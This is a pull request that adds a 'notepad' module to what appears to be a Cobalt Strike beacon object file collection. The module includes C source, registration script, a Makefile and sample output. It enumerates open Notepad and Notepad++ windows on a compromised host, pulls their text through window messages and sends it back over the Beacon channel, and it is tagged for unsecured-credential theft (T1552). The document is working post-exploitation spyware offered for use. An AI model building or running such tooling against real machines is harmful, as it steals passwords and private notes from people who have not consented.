### PR TITLE
Add notepad spy

### DIFF
--- a/SA/SA.cna
+++ b/SA/SA.cna
@@ -304,6 +304,15 @@ beacon_command_register("locale",
 "Retrieve System Locale Information, Date Format, and Country", 
 "Synopsis: locale \n\nPrints locale information");
 
+alias notepad {
+	btask($1, "Searching for open notepad windows", "T1552");
+	beacon_inline_execute($1,readbof($1,'notepad'),"go",$null);
+}
+
+beacon_command_register("notepad", 
+"Search for open notepad and notepad++ windows and grab text from the editor control object", 
+"Synopsis: notepad \n\nPrints any observed open notepad or notepad++ sessions and prints their contents. Not reliant on clipboard. Not reliant on window being non-minimized");
+
 alias netuse_add {
 	local('$args $device $share $user $password $persist $requireencrypt %params');
 

--- a/src/SA/notepad/Makefile
+++ b/src/SA/notepad/Makefile
@@ -1,0 +1,25 @@
+BOFNAME := notepad
+COMINCLUDE := -I ../../common
+LIBINCLUDE := 
+CC_x64 := x86_64-w64-mingw32-gcc
+CC_x86 := i686-w64-mingw32-gcc
+CC=x86_64-w64-mingw32-clang
+
+all:
+	$(CC_x64) -o $(BOFNAME).x64.o $(COMINCLUDE) -Os -c entry.c -DBOF 
+	$(CC_x86) -o $(BOFNAME).x86.o $(COMINCLUDE) -Os -c entry.c -DBOF
+	mkdir -p ../../../SA/$(BOFNAME)
+	mv $(BOFNAME)*.o ../../../SA/$(BOFNAME)
+
+test:
+	$(CC_x64) entry.c -g $(COMINCLUDE) $(LIBINCLUDE)  -o $(BOFNAME).x64.exe
+	$(CC_x86) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x86.exe
+
+scanbuild:
+	$(CC) entry.c -o $(BOFNAME).scanbuild.exe $(COMINCLUDE) $(LIBINCLUDE)
+
+check:
+	cppcheck --enable=all $(COMINCLUDE) --platform=win64 entry.c
+
+clean:
+	rm $(BOFNAME).*.exe

--- a/src/SA/notepad/entry.c
+++ b/src/SA/notepad/entry.c
@@ -10,59 +10,64 @@
 
 BOOL CALLBACK EnumWindowClasses(HWND hWndParent, LPARAM lParam)
 {
-	char ClassName[128] = {0};
-	char WindowName[128] = {0};
-	char *buffer;
-	int len = 65535;
-	char *needle = (char*) lParam;
-	DWORD WinLen = USER32$GetClassNameA(hWndParent, ClassName, 127);
-	WinLen = USER32$GetWindowTextA(hWndParent, WindowName, 127);
+	// hWndParent - the parent is the handle to the Window passed by USER32$EnumChildWindows callback to this function
+	// lParam - the name of the control we are looking for
+	
+	char ControlName[128] = {0};														// The name of this child control
+	char WindowName[128] = {0};															// The Title/Caption of the parent window
+	char *needle = (char*) lParam;														// the control name we are searching for
+	DWORD WinLen = USER32$GetClassNameA(hWndParent, ControlName, 127);					// get the name of this child control
 
-	if (ClassName[0] != 0 && WinLen){
-		if(MSVCRT$strcmp(ClassName, needle) == 0) {
-			buffer = (char*)MSVCRT$calloc(1, len+1);
+	if (ControlName[0] != 0 && WinLen) {
+		if(MSVCRT$strcmp(ControlName, needle) == 0) {
+			char *buffer;
+			int len = 0;
+			WinLen = USER32$GetWindowTextA(hWndParent, WindowName, 127);				// get the Title/Caption of the parent window
+			len = USER32$SendMessageA(hWndParent, WM_GETTEXTLENGTH, 0, 0);				// get the length of the control contents
+			if(len == 0) {
+					return TRUE;														// control had no text to copy, keep looking
+			}
+			buffer = (char*)MSVCRT$calloc(1, len+1);									// add room for null termination
 			USER32$SendMessageA(hWndParent, WM_GETTEXT, len, (LPARAM)buffer);
 			BeaconPrintf(CALLBACK_OUTPUT, "[+] Notepad++ Found: %s\n%s", WindowName, buffer);
+			MSVCRT$free(buffer);
 		}
 	} 
 	return TRUE;
 }
 
 BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) {
-	char WindowName[128] = {0};
+	// hwnd is a handle to the parent passed to this callback via the EnumWindowsProc in go()
+	// lParam is the text we are looking for in the window title/caption
+	char WindowName[128] = {0};															// the title/caption of the window
 	DWORD WinLen = USER32$GetWindowTextA(hwnd, WindowName, 127);
 
-	if (WindowName[0] != 0 && WinLen){													// Did I get a window name
-		if(USER32$IsWindowVisible(hwnd))												// Is the window name visible
-		{
+	if (WindowName[0] != 0 && WinLen) {													// Did I get a window name
+		if(USER32$IsWindowVisible(hwnd)) {												// Is the window name visible
 			PCHAR index = MSVCRT$strstr(WindowName, (char*)lParam);						// Is my search string in the window name
 			if(index) {
 				HWND editHwnd = NULL;
 				char *buffer;
-				int len = 65535;
+				int len = 0;
 				editHwnd = USER32$FindWindowExA(hwnd, NULL, "Edit", NULL);				// Edit is the default control for textarea in notepad
-				if (editHwnd)
-				{
+				if (editHwnd) {
+					len = USER32$SendMessageA(editHwnd, WM_GETTEXTLENGTH, 0, 0);		// get the length of the control contents
 					buffer = (char*)MSVCRT$calloc(1, len+1);
 					USER32$SendMessageA(editHwnd, WM_GETTEXT,len,(LPARAM)buffer);
-					char classname[128];
-					USER32$GetClassNameA(editHwnd, (LPSTR) classname, 128);
 					BeaconPrintf(CALLBACK_OUTPUT, "[+] Notepad Found: %s\n%s\n", WindowName, buffer);
+					MSVCRT$free(buffer);
 				} else {
 					char *controlName = "Scintilla";									// It wasnt notepad, maybe notepad++, query the Scintilla control
 					USER32$EnumChildWindows(hwnd, (WNDENUMPROC)EnumWindowClasses, (LPARAM) controlName);
 				}
-			} 
+			}
 		}
-		
-	} 
+	}
 	return TRUE;
 }
 
 
 void go(IN PCHAR Buffer, IN ULONG Length) {
-	datap parser;
-	BeaconDataParse(&parser, Buffer, Length);
 	const char *windowname = "Notepad";
 	USER32$EnumDesktopWindows(NULL,(WNDENUMPROC)EnumWindowsProc,(LPARAM) windowname);
 }

--- a/src/SA/notepad/entry.c
+++ b/src/SA/notepad/entry.c
@@ -1,0 +1,75 @@
+#include <windows.h>
+#include "bofdefs.h"
+#include "base.c"
+/*	Idea based on https://github.com/trainr3kt/NoteThief
+	- The original only grabbed the highest level Z window
+	- Searches all visible windows with non-null names
+	- Adds ability to steal data from notepad++
+	- Could potentially be expanded to allow specification of a string to search for in Window Name and a string to correspond to a control
+*/
+
+BOOL CALLBACK EnumWindowClasses(HWND hWndParent, LPARAM lParam)
+{
+	char ClassName[128] = {0};
+	char WindowName[128] = {0};
+	char *buffer;
+	int len = 65535;
+	char *needle = (char*) lParam;
+	DWORD WinLen = USER32$GetClassNameA(hWndParent, ClassName, 127);
+	WinLen = USER32$GetWindowTextA(hWndParent, WindowName, 127);
+
+	if (ClassName[0] != 0 && WinLen){
+		if(MSVCRT$strcmp(ClassName, needle) == 0) {
+			buffer = (char*)MSVCRT$calloc(1, len+1);
+			USER32$SendMessageA(hWndParent, WM_GETTEXT, len, (LPARAM)buffer);
+			BeaconPrintf(CALLBACK_OUTPUT, "[+] Notepad++ Found: %s\n%s", WindowName, buffer);
+		}
+	} 
+	return TRUE;
+}
+
+BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) {
+	char WindowName[128] = {0};
+	DWORD WinLen = USER32$GetWindowTextA(hwnd, WindowName, 127);
+
+	if (WindowName[0] != 0 && WinLen){													// Did I get a window name
+		if(USER32$IsWindowVisible(hwnd))												// Is the window name visible
+		{
+			PCHAR index = MSVCRT$strstr(WindowName, (char*)lParam);						// Is my search string in the window name
+			if(index) {
+				HWND editHwnd = NULL;
+				char *buffer;
+				int len = 65535;
+				editHwnd = USER32$FindWindowExA(hwnd, NULL, "Edit", NULL);				// Edit is the default control for textarea in notepad
+				if (editHwnd)
+				{
+					buffer = (char*)MSVCRT$calloc(1, len+1);
+					USER32$SendMessageA(editHwnd, WM_GETTEXT,len,(LPARAM)buffer);
+					char classname[128];
+					USER32$GetClassNameA(editHwnd, (LPSTR) classname, 128);
+					BeaconPrintf(CALLBACK_OUTPUT, "[+] Notepad Found: %s\n%s\n", WindowName, buffer);
+				} else {
+					char *controlName = "Scintilla";									// It wasnt notepad, maybe notepad++, query the Scintilla control
+					USER32$EnumChildWindows(hwnd, (WNDENUMPROC)EnumWindowClasses, (LPARAM) controlName);
+				}
+			} 
+		}
+		
+	} 
+	return TRUE;
+}
+
+
+void go(IN PCHAR Buffer, IN ULONG Length) {
+	datap parser;
+	BeaconDataParse(&parser, Buffer, Length);
+	const char *windowname = "Notepad";
+	USER32$EnumDesktopWindows(NULL,(WNDENUMPROC)EnumWindowsProc,(LPARAM) windowname);
+}
+
+#ifndef BOF
+int main() {
+	go(NULL, 0);
+	return 0;
+}
+#endif

--- a/src/common/bofdefs.h
+++ b/src/common/bofdefs.h
@@ -184,6 +184,11 @@ WINUSERAPI int WINAPI USER32$IsWindowVisible (HWND hWnd);
 WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND hWnd,LPSTR lpString,int nMaxCount);
 WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd,LPSTR lpClassName,int nMaxCount);
 WINUSERAPI LPWSTR WINAPI USER32$CharPrevW(LPCWSTR lpszStart,LPCWSTR lpszCurrent);
+WINUSERAPI HWND WINAPI USER32$FindWindowExA (HWND hWndParent, HWND hWndChildAfter, LPCSTR lpszClass, LPCSTR lpszWindow);
+WINUSERAPI LRESULT WINAPI USER32$SendMessageA (HWND hwnd, UINT Msg, WPARAM wParam, LPARAM lParam);
+WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND  hWnd, LPSTR lpString, int nMaxCount);
+WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd, LPTSTR lpClassName, int nMaxCount);
+WINUSERAPI BOOL WINAPI USER32$EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam);
 
 //secur32
 WINBASEAPI BOOLEAN WINAPI SECUR32$GetUserNameExA (int NameFormat, LPSTR lpNameBuffer, PULONG nSize);
@@ -595,6 +600,11 @@ DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueA(LPCVOID pBlock, LPCSTR lpS
 #define USER32$GetWindowTextA GetWindowTextA
 #define USER32$GetClassNameA GetClassNameA
 #define USER32$CharPrevW CharPrevW
+#define USER32$FindWindowExA FindWindowExA 
+#define USER32$SendMessageA SendMessageA
+#define USER32$GetWindowTextA GetWindowTextA
+#define USER32$GetClassNameA GetClassNameA
+#define USER32$EnumChildWindows EnumChildWindows
 #define SECUR32$GetUserNameExA  GetUserNameExA 
 #define SHLWAPI$StrStrIA StrStrIA
 #define ADVAPI32$OpenProcessToken  OpenProcessToken 


### PR DESCRIPTION
Idea based on: https://github.com/trainr3kt/NoteThief
The original would only grab the top most Z item and stop.
The original only did notepad.
This module borrows code and searches all visible windows with non-null names for potential sources.
This module has been written in a way to support changing the WindowName search text and ControlName search text in the future (Enum* functions don't easily support having 2 parameters so i passed on this for the time being)

The module grabs the text by calling GetWindowTextA on the control object for the editor ('Edit' for notepad and 'Scintilla' for notepad++) and is not reliant on the clipboard.

I opened 3 notepads, each having 'test1, test2, test3' in them respectively and one notepad++ containing 'this is a test in notepad ++'

Output of BOF:
```
> notepad
[*] Searching for open notepad windows
Running notepad

[*] Running notepad
[+] host called home, sent: 2690 bytes
received output:
[+] Notepad++ Found: Notepad++
this is a test in notepad ++

received output:
[+] Notepad++ Found: Notepad++

received output:
[+] Notepad++ Found: Notepad++

received output:
[+] Notepad++ Found: Notepad++

received output:
[+] Notepad Found: *Untitled - Notepad
test3

received output:
[+] Notepad Found: *Untitled - Notepad
test2

received output:
[+] Notepad Found: *Untitled - Notepad
test1

```

Notepad++ does have more than one scintilla control. I did not dig into that further (that is why you see several reported).
